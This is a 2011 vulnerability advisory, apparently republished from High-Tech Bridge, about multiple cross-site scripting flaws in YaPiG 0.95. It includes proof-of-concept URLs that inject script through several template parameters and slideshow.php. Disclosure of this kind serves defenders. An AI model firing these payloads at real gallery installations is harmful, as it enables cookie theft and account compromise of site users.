HTB22962: Multiple XSS in YaPiG

2011-05-03T00:00:00
ID SECURITYVULNS:DOC:26289
Type securityvulns
Reporter Securityvulns
Modified 2011-05-03T00:00:00

Description

Vulnerability ID: HTB22962 Reference: http://www.htbridge.ch/advisory/multiple_xss_in_yapig.html Product: YaPiG (Yet Another PHP Image Gallery) Vendor: http://yapig.sourceforge.net/ ( http://yapig.sourceforge.net/ ) Vulnerable Version: 0.95 Vendor Notification: 19 April 2011 Vulnerability Type: XSS (Cross Site Scripting) Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )

Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/template/default/" scripts to properly sanitize user-supplied input then register_globals on. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. The following PoC is available:

http://[host]/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

The vulnerability exists due to failure in the "slideshow.php" scripts to properly sanitize user-supplied input. The following PoC is available:

http://[host]/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E